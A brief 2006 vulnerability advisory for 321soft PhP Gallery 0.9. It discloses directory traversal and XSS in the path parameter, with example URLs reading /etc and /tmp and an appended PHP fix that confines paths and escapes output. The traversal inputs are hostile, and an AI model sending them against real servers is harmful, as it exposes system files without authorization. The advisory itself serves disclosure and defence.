321soft PhP Gallery 0.9 - directory traversal & XSS
--------------------------------------------------------
Software: 321soft PhP Gallery
Version: 0.9
Type: directory traversal & XSS
Date: May 3 01:38:04 CEST 2006
Vendor: 321soft.de
Page: http://321soft.de/
Risk: Medium

credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/

vulnerability:
----------------------------
http://[target]/index.php?path=/etc
http://[target]/index.php?path=/tmp

http://[target]/index.php?path=[XSS]

solution:
----------------------------
index.php
fix $path
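
One way such a fix could look, as an added example that is not the vendor's code and not part of the original advisory: the path parameter is canonicalized and confined to the gallery directory, and any echoed value is HTML-escaped. GALLERY_ROOT, resolve_gallery_path() and h() are hypothetical names, and the root directory is an assumed location.

```php
<?php
// Added example: hypothetical hardening for a gallery's ?path= parameter.
// GALLERY_ROOT and both function names are assumptions, not the vendor's code.
const GALLERY_ROOT = '/var/www/gallery/images';

/**
 * Resolve a user-supplied path against the gallery root.
 * Returns the canonical directory, or null if it does not exist
 * or resolves outside the root (e.g. "/etc", "../..", symlinks).
 */
function resolve_gallery_path(string $userPath, string $root = GALLERY_ROOT): ?string
{
    if (strpos($userPath, "\0") !== false) {
        return null;                       // reject embedded NUL bytes
    }
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return null;                       // misconfigured root: fail closed
    }
    // Treat input as relative to the root, so "/etc" becomes "<root>/etc".
    $candidate = realpath($rootReal . DIRECTORY_SEPARATOR . ltrim($userPath, '/\\'));
    if ($candidate === false || !is_dir($candidate)) {
        return null;
    }
    // After symlink and ".." resolution the result must be the root or below it.
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    if ($candidate !== $rootReal && strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

/** Escape a value for output in an HTML context (addresses the XSS case). */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$requested = isset($_GET['path']) && is_string($_GET['path']) ? $_GET['path'] : '';
$dir = resolve_gallery_path($requested);
if ($dir === null) {
    http_response_code(400);
    echo 'Invalid path: ' . h($requested);  // never echo the raw parameter
    exit;
}
echo '<h1>' . h(basename($dir)) . '</h1>';
```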

notes:
----------------------------
The vendor has been informed.

http://d4igoro.blogspot.com/2006/05/321soft-php-gallery-09-directory.html